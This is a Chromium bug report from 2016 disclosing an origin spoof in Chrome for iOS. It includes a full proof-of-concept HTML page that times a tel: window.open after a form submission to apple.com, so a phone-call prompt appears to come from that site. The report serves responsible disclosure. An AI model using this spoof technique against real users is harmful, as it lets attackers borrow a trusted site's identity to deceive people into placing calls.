URL Scheme Reference Origin Spoof in Chrome iOS
Reported by martinzh...@gmail.com, Dec 16 2016
Issue description

Steps to reproduce the problem:
In the latest Chrome iOS browser, open PoC.html. The source code is listed below:

    <!DOCTYPE HTML>
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    </head>
    <body>
    <form action="https://www.apple.com" target="aa" method="get" onsubmit="setTimeout('p()',1200);">
    <input type="submit">
    </form>
    <script>
    function p() {
      var t = window.open('tel:10010','aa');
    }
    </script>
    </body>
    </html>

You will find that it seems like 'https://www.apple.com' intends to call 10010.

What is the expected behavior?
This problem can also be reproduced in Firefox iOS and Safari on iOS 10.2, so I also filed this issue with Mozilla. A Firefox iOS developer thought it was a bug and filed it with the WebKit project: https://bugs.webkit.org/show_bug.cgi?id=165160
So I think that it is important to let you know.

What went wrong?
You can take a look at PoC.png. You will find that it seems like 'https://www.apple.com' intends to call 10010. This is another kind of spoof.

Did this work before? N/A

Chrome version: 55.0.2883.79  Channel: stable
OS Version: 10.2
Flash Version: Shockwave Flash 21.9 r9
Jun 7 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by elawrence@chromium.org, Dec 16 2016
Status: Duplicate (was: Unconfirmed)